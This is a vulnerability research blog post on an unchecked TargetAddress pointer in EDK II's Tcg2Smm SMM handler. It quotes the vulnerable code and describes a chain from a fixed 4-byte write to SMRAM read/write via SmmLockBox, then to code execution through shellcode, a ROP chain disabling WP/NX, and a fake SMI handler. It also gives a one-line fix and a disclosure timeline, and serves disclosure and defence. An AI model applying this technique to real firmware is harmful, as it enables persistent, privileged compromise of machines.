For Science! - Using an Unimpressive Bug in EDK II to Do Some Fun Exploitation

Posted Fri 23 June 2023
Author Gwaby
Category Exploitation
Tags UEFI, SMM, vulnerability, 2023

In this blog post we'll see a technique to gain code execution in SMM from a very limited write primitive.

Context

EDK II is the main public implementation of UEFI on which a large part of the manufacturers rely to craft their own firmware. It is available on GitHub and supported by TianoCore community.

A bug was identified in this implementation and more specifically in Tcg2Smm module. It is due to a lack of validation in an SMM handler that allows an attacker to write arbitrary data in SMM.

Said like that, it seems quite neat. However, just to kill any expectation the reader may have: this bug is only available before reaching the end of DXE phase. As a matter of fact, the vulnerable handler is unregistered once the EFI_SMM_READY_TO_LOCK_PROTOCOL protocol is published. In other words, it only becomes powerful if chained with another vulnerability and as a way to escalate privileges to SMM during a pre-boot attack.

Considering the git history of the impacted piece of code, it seems this bug was introduced two years ago while separating Tcg2Smm into 2 modules (commit 3c2dc30). This blog post is based on the version of EDK II, commit 02fcfdc (yeah, I procrastinated a bit before publishing it).

Some Recap

You can skip this part and directly go here if you're already familiar with UEFI ecosystem.

System Management Mode (SMM)[*] is a special purpose and privileged operating mode defined in IA CPU architecture (ring -2). The code running in this mode handles critical resources and is, among other things, partially in charge of protecting the boot process. Data and code running on this mode are located on an isolated memory region called SMRAM for which protections prevent code in less privileged mode to access.

[*]: The actual name is simply "Management Mode" in recent (after 2017 at least) literature. However, as most whitepapers still mention SMM (because they usually date from 2016 or before), it's easier to stick to this designation for now.

Entering SMM is done via a System Management Interrupt (SMI, a.k.a. MMI now), which can be triggered by:

An event signaled on the processor chip SPI# pin;
A write access on a specific I/O port (usually 0xb2).

When a SMI happens, the processor jumps on a specific vector that saves the CPU current context. Then it switches to a separate operating environment defined by a new address space. SMIs generated by software synchronously (like writing on the I/O port) are commonly called software SMI or SWSMI.

Data communication between non-SMM and SMM is performed through:

An ACPI table;
A UEFI protocol named EFI_SMM_COMMUNICATION_PROTOCOL.

The EFI_SMM_COMMUNICATION_PROTOCOL protocol provides routines that enable non-SMM modules to reach SMM handlers that have previously been registered. To do so, the module initializes a communication buffer outside of SMRAM with the GUID identifying the handler it wishes to target and passes it to the EFI_SMM_COMMUNICATION_PROTOCOL.Communicate method. This buffer is then shared with the corresponding SMM handler in SMRAM. The latter returns its response in the same buffer.

Communication through the ACPI table describes a special type of software SMI that can be used by non-firmware components to reach SMM. Instead of needing a UEFI protocol, the component just reports the SMM communication buffer address in an ACPI table or via general-purpose registers. It then invokes the SWSMI and the corresponding handler is triggered.

The Bug

The Tcg2Smm module is used to implement the TPM 2.0 definition block in an ACPI table. It registers several methods of communication:

two software SMI callback functions (Tcg2PhysicalPresence and MemoryClear) used to handle the requests from the ACPI method;
a handler to communicate the NVS region and SMI channel between SMM and DXE through EFI_SMM_COMMUNICATION_PROTOCOL protocol.

The latter, implemented in Tcg2Smm.c, takes a TPM_NVS_MM_COMM_BUFFER structure as data in the communication buffer. This structure has the following definition:

typedef struct {
  UINT64                  Function;
  UINT64                  ReturnStatus;
  EFI_PHYSICAL_ADDRESS    TargetAddress;
  UINT64                  RegisteredPpSwiValue;
  UINT64                  RegisteredMcSwiValue;
} TPM_NVS_MM_COMM_BUFFER;

While the communication buffer (CommBuffer in the following snippet) is correctly validated to ensure that it is outside of SMRAM, the structure includes an address (TargetAddress) that is directly used, without any checks, to fill the global variable named mTcgNvs.

// Tcg2Smm.c L. 90

EFI_STATUS
EFIAPI
TpmNvsCommunciate (
  IN     EFI_HANDLE  DispatchHandle,
  IN     CONST VOID  *RegisterContext,
  IN OUT VOID        *CommBuffer,
  IN OUT UINTN       *CommBufferSize
  )
{
  EFI_STATUS              Status;
  UINTN                   TempCommBufferSize;
  TPM_NVS_MM_COMM_BUFFER  *CommParams;

  //
  // If input is invalid, stop processing this SMI
  //
  if ((CommBuffer == NULL) || (CommBufferSize == NULL)) {
    return EFI_SUCCESS;
  }

  TempCommBufferSize = *CommBufferSize;

  if (TempCommBufferSize != sizeof (TPM_NVS_MM_COMM_BUFFER)) {
    DEBUG ((DEBUG_ERROR, "[%a] MM Communication buffer size is invalid for this handler!\n", __FUNCTION__));
    return EFI_ACCESS_DENIED;
  }

  if (!IsBufferOutsideMmValid ((UINTN)CommBuffer, TempCommBufferSize)) {
    DEBUG ((DEBUG_ERROR, "[%a] - MM Communication buffer in invalid location!\n", __FUNCTION__));
    return EFI_ACCESS_DENIED;
  }

//
// Farm out the job to individual functions based on what was requested.
//
CommParams = (TPM_NVS_MM_COMM_BUFFER *)CommBuffer;
Status     = EFI_SUCCESS;
switch (CommParams->Function) {
    case TpmNvsMmExchangeInfo:
        DEBUG ((DEBUG_VERBOSE, "[%a] - Function requested: MM_EXCHANGE_NVS_INFO\n", __FUNCTION__));
        CommParams->RegisteredPpSwiValue = mPpSoftwareSmi;
        CommParams->RegisteredMcSwiValue = mMcSoftwareSmi;
        mTcgNvs                          = (TCG_NVS *)(UINTN)CommParams->TargetAddress;
        break;
    default:
        DEBUG ((DEBUG_INFO, "[%a] - Unknown function %d!\n", __FUNCTION__, CommParams->Function));
        Status = EFI_UNSUPPORTED;
        break;
}

This global variable holds a pointer to a TCG_NVS structure which is later used to retrieve the NVS region when handling the software SMI. The following snippet shows an example of mTcgNvs manipulation via the Tcg2PhysicalPresence handler:

// Tcg2Smm.c L. 131

EFI_STATUS
EFIAPI
PhysicalPresenceCallback (
  IN EFI_HANDLE  DispatchHandle,
  IN CONST VOID  *Context,
  IN OUT VOID    *CommBuffer,
  IN OUT UINTN   *CommBufferSize
  )
{
  UINT32  MostRecentRequest;
  UINT32  Response;
  UINT32  OperationRequest;
  UINT32  RequestParameter;

  if (mTcgNvs->PhysicalPresence.Parameter == TCG_ACPI_FUNCTION_RETURN_REQUEST_RESPONSE_TO_OS) {
    mTcgNvs->PhysicalPresence.ReturnCode = Tcg2PhysicalPresenceLibReturnOperationResponseToOsFunction (
                                             &MostRecentRequest,
                                             &Response
                                             );
    mTcgNvs->PhysicalPresence.LastRequest = MostRecentRequest;
    mTcgNvs->PhysicalPresence.Response    = Response;
    return EFI_SUCCESS;
  }

    // [...]
}

For the record, the TCG_NVS has the following definition:

##pragma pack(1)
typedef struct {
  PHYSICAL_PRESENCE_NVS    PhysicalPresence;
  MEMORY_CLEAR_NVS         MemoryClear;
  UINT32                   PPRequestUserConfirm;
  UINT32                   TpmIrqNum;
  BOOLEAN                  IsShortFormPkgLength;
} TCG_NVS;

typedef struct {
  UINT8     SoftwareSmi;
  UINT32    Parameter;
  UINT32    Response;
  UINT32    Request;
  UINT32    RequestParameter;
  UINT32    LastRequest;
  UINT32    ReturnCode;
} PHYSICAL_PRESENCE_NVS;

typedef struct {
  UINT8     SoftwareSmi;
  UINT32    Parameter;
  UINT32    Request;
  UINT32    ReturnCode;
} MEMORY_CLEAR_NVS;

Depending on the SMI callback used and the value of the Parameter field in the structure, it is, therefore, possible to arbitrarily write values anywhere in SMRAM. The following list synthesizes the possible outcomes:

PhysicalPresence callback:
- PHYSICAL_PRESENCE_NVS.Parameter == 2:
  - PHYSICAL_PRESENCE_NVS.Request = 0x000000XX;
  - PHYSICAL_PRESENCE_NVS.ReturnCode = 0x00000001;
  - Leak several bytes of SMRAM in Tcg2PhysicalPresence nvs variable;
- PHYSICAL_PRESENCE_NVS.Parameter == 5:
  - PHYSICAL_PRESENCE_NVS.Response = 0xXXXXXXXX;
  - PHYSICAL_PRESENCE_NVS.LastRequest = 0x000000XX;
  - PHYSICAL_PRESENCE_NVS.ReturnCode = 0x00000000l;
- PHYSICAL_PRESENCE_NVS.Parameter == 7:
  - PHYSICAL_PRESENCE_NVS.Request = 0x000000XX;
  - PHYSICAL_PRESENCE_NVS.ReturnCode = 0x00000001;
  - Leak several bytes of SMRAM in Tcg2PhysicalPresence nvs variable;
- PHYSICAL_PRESENCE_NVS.Parameter == 8:
  - PHYSICAL_PRESENCE_NVS.ReturnCode = 0x00000000;
MemoryClear callback:
- MEMORY_CLEAR_NVS.Parameter == 1:
  - MEMORY_CLEAR_NVS.ReturnCode = 0x00000000;
- MEMORY_CLEAR_NVS.Parameter == 2:
  - MEMORY_CLEAR_NVS.ReturnCode = 0x00000000;
- default value:
  - MEMORY_CLEAR_NVS.ReturnCode = 0x00000001.

Where XX indicates that the value is retrieved from a non-volatile variable (Tcg2PhysicalPresence).

Thus, the easiest manipulation we can gain is writting 0x00000001 to (almost) any arbitrary memory address (i.e. the default case).

Exploitation

As it was described in the previous section, the write primitive induced by the manipulation of mTcgNvs is quite limited. This section illustrates a way to transform it into actual code execution. For the purpose of demonstrating the actual feasibility of an attack using this bug, we put ourselves in a scenario where we already have code execution in DXE.

4-byte Write Primitive to Arbitrary Read-Write Primitive

Considering the conditions and outcomes that go with the flaw, the easiest manipulation we can gain is a fixed 4-byte write primitive of 0x00000001 anywhere in SMRAM (using the MemoryClear SWSMI callback). It is possible to transform this rather weak primitive into something more powerful by corrupting global variables used in other SMI handlers.

For the sake of the reproducibility of the exploit, we decided to only focus on SMI handlers that are provided "as is" in EDK II. In such context, one possible module that could be worth corrupting is SMMLockBox.
This module works as a vault and aims at protecting the integrity of the BootScripts used during the S3 resume process by saving their content into SMRAM. It basically provides a SMI handler that allows to save and restore arbitrary data in SMM.

Note: the LockBox SMI handler is also locked at the end of the DXE phase. However, considering the scenario in which we are (i.e., executing code before EndOfDxe protocol publication), we are not impacted by this limitation. Should we handle this issue, it would simply add an extra step in the exploit chain (changing the value of the mLocked variable to "unlock" the handler). More information about this can be found in the slides I presented at Sthack 2023.

In order to transform the SmmLockBox SMI handler into a proper Read/Write SMRAM primitive, one needs to change the value of the mSmmMemLibInternalSmramCount variable. This variable is used by SmmIsBufferOutsideSmmValid to ensure, among other things, that the provided buffer does not overlap with the SMRAM.

// SmmMemLib.c L. 112

BOOLEAN
EFIAPI
SmmIsBufferOutsideSmmValid (
  IN EFI_PHYSICAL_ADDRESS  Buffer,
  IN UINT64                Length
  )
{
// [...]

  for (Index = 0; Index < mSmmMemLibInternalSmramCount; Index++) {
    if (((Buffer >= mSmmMemLibInternalSmramRanges[Index].CpuStart) && (Buffer < mSmmMemLibInternalSmramRanges[Index].CpuStart + mSmmMemLibInternalSmramRanges[Index].PhysicalSize)) ||
        ((mSmmMemLibInternalSmramRanges[Index].CpuStart >= Buffer) && (mSmmMemLibInternalSmramRanges[Index].CpuStart < Buffer + Length)))
    {
      DEBUG ((
        DEBUG_ERROR,
        "SmmIsBufferOutsideSmmValid: Overlap: Buffer (0x%lx) - Length (0x%lx), ",
        Buffer,
        Length
        ));
      DEBUG ((
        DEBUG_ERROR,
        "CpuStart (0x%lx) - PhysicalSize (0x%lx)\n",
        mSmmMemLibInternalSmramRanges[Index].CpuStart,
        mSmmMemLibInternalSmramRanges[Index].PhysicalSize
        ));
      return FALSE;
    }
  }
  // [...]
    return TRUE;
}

Since we can write 0x00000001 anywhere, it is possible to overwrite the variable with the higher bytes of the primitive to set it to 0. This prevents iteration over the SMRAM memory ranges and ensuring that the buffer is outside the SMRAM.

As a side note, we noticed that in our test environment, the first range referenced in the mSmmMemLibInternalSmramRanges list is 0x7000000 - 0x7001000.

SMRAM ranges dumped from OVMF:

PhysicalStart	CpuStart	PhysicalSize	RegionState
0x7000000	0x7000000	0x001000	`EFI_ALLOCATED` `EFI_CACHEABLE`
0x7001000	0x7001000	0xFFF000	`EFI_CACHEABLE`

Since the data used here are located at higher addresses, we could also simply align the corruption with the address of the variable and set the value to 1 without issue.

With this check removed, it becomes very straightforward to craft a read/write primitive in SMRAM. The steps are:

Create a LockBox entry with the LockBox command EFI_SMM_LOCK_BOX_COMMAND_SAVE;
In order to read in SMRAM:
- Update the entry with an address in SMRAM (EFI_SMM_LOCK_BOX_COMMAND_UPDATE). This will copy the content into the LockBox buffer;
- Restore the Lockbox with EFI_SMM_LOCK_BOX_COMMAND_RESTORE to retrieve the data.
In order to write in SMRAM:
- Update the entry with a controlled buffer outside of SMRAM (EFI_SMM_LOCK_BOX_COMMAND_UPDATE);
- Send a EFI_SMM_LOCK_BOX_COMMAND_RESTORE request with an address in SMRAM. This will overwrite the data at this address with the content that has been previously sent.

Arbitrary Read-Write Primitive to Code Execution

Once again, we'll leverage the use of the SmmLockBox module for the sake of exploitation. Adding a LockBox entry via EFI_SMM_LOCK_BOX_COMMAND_SAVE provides a handy way to arbitrarily allocate pool buffers in SMRAM. Using this feature, it is possible to send and store a shellcode in SMRAM.

As LockBox entries are linked together in a LIST_ENTRY, finding the location of the buffer can be achieved by retrieving the last entry added to the list head (stored in the global variable mLockBoxQueue).

The only drawback of this technique is that the buffer is allocated as EfiRuntimeServicesData memory, meaning that the page in which the shellcode is stored is non-executable. The access protection is enforced at the page table level and those tables are write-protected. In addition, if the target enforces the AMD Secure Encrypted Virtualization, one needs to retrieve the value that has been used to protect the table entries.

In the end, this issue is rather easy to overcome by crafting a ROP chain modifying the CR0 register, and tweaking the right PTE to respectively remove both the WP and NX bits.

The actual execution is done by inserting a fake SMI handler in the double-linked list stored in PiSmmCore.

Side note: The page-level protection is enforced only if the modules are aligned on a page boundary. This should be the case most of the time, except when the developers forget to add the correct build option, as it is the case for the MSFT toolchain in the OVMF package. :-^

Remediation

Ultimately, the remediation is straightforward: one simply needs to verify that the location of the structure pointed by CommParams->TargetAddress does not overlap with the SMRAM. The following piece of code illustrates this validation:

  // Tcg2Smm.c L.90

    if (!IsBufferOutsideMmValid (CommParams->TargetAddress, sizeof(TCG_NVS))) {
    return EFI_ACCESS_DENIED;
  }

Conclusion

We discovered a small bug in the public implementation of EDK II that, chained with another flaw, could allow an attacker to gain access to SMM. While the bug is not outstanding in itself, the limited primitive it offers became a nice excuse to play with exploitation techniques for this kind of target.

Even though the remediation is only one line long, the bug was dimmed as not a vulnerability by the community so no fix is planned for now.

Acknowledgments

Thanks to the colleagues that take time to manage this blog and proofread all the posts. Also, thanks to Ivan for handling the disclosure process. Oh, and thanks to you for reading until the very end (even the acknowledgment, that's cool!). :D

Disclosure timeline

This timeline is not exhaustive and only lists events that we deemed relevant to the disclosure process.

2023-03-14 Quarkslab notified CERT/CC of the vulnerability. Technical report, proof of concept code, and a suggested one line code fix were provided. Case opened in the VINCE portal. The bug is tracked as VU#892082.
2023-03-17 Tianocore opens an issue in the project's bug tracker.
2023-03-23 Tianocore's initial assessment of the bug is that since DXE code already has access to SMM the validity check on the pointer should be done but the bug is not considered a vulnerability.
2023-03-27 Further assessment by Tianocore's engineers agree the bug should not be considered a vulnerability.
2023-04-05 Tianocore opens access to the Bugzilla issue and changes its status to Unassigned
2023-04-07 CERT/CC notified Quarkslab of Tianocore's assessment.
2023-04-14 Quarkslab told CERT/CC that it will review Tianocore's assessment and discuss it internally.
2023-05-10 Quarkslab posted our assessment on the VINCE portal and told CERT/CC that after discussing Tianocore's feedback internally and looking at the source code, we concluded that their assessment is not entirely consistent with the actual code. The assessment concluded that the bug isn’t a vulnerability because code in DXE stage is trusted anyway and can write to SMRAM. However, the actual code does attempt to validate the address of the communication buffer (CommBuffer) by calling function IsBufferOutsideMmValid(), which indicates that an access check is indeed performed, and the problem is just that a similar call is missing later, before assigning a pointer to the mTcgNvs member. However, Quarkslab said that if Tianocore's experts insist in not considering the bug a vulnerability that assessment will not be contested. Nonetheless it was suggested to apply the provided one line fix.
2023-05-12 gwaby describes the bug and the exploitation technique in her talk at the Sthack conference.
2023-06-23 This blog post is published.

If you would like to learn more about our security audits and explore how we can help you, get in touch with us!

Table of contents